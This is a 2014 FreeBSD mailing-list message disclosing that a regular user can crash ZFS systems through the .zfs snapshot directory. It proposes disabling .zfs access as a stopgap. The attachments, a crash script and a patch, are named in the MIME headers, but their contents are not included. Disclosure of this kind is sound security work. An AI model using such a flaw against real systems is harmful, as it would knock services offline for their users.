Date:      Fri, 17 Jan 2014 03:11:44 +0100 (CET)
From:      Richard Kojedzinszky <krichy@cflinux.hu>
To:        freebsd-fs@freebsd.org
Cc:        freebsd-security@freebsd.org
Subject:   ZFS .zfs DoS
Message-ID:  <alpine.BSF.2.00.1401170304070.83798@pi.nmdps.net>

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.

--2628712688-1861051549-1389924707=:83798
Content-Type: TEXT/PLAIN; format=flowed; charset=US-ASCII

Dear users,

For a long time now I've been investigating problems relating to FreeBSD ZFS 
.zfs handling, and found that I am not enough to fix issues. Until fixes 
arrive, unfortunately a regular user can DoS a FreeBSD system which has 
ZFS filesystems with the attached script. While the script expects a 
snapshot argument to be given, actually the first test case does not need 
that, only a mounted zfs filesystem is enough. For more of the tests a 
snapshot may be needed, and later ones need root account also.

I would recommend that until this gets rewritten or fixed at all, one 
should disable access to .zfs at all with something like I've attached.

Regards,
Kojedzinszky Richard
--2628712688-1861051549-1389924707=:83798
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=crash.sh
Content-Transfer-Encoding: BASE64
Content-ID: <alpine.BSF.2.00.1401170311440.83798@pi.nmdps.net>
Content-Description: 
Content-Disposition: attachment; filename=crash.sh

--2628712688-1861051549-1389924707=:83798
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=no_dot_zfs_at_all.patch
Content-Transfer-Encoding: BASE64
Content-ID: <alpine.BSF.2.00.1401170311441.83798@pi.nmdps.net>
Content-Description: 
Content-Disposition: attachment; filename=no_dot_zfs_at_all.patch

--2628712688-1861051549-1389924707=:83798--


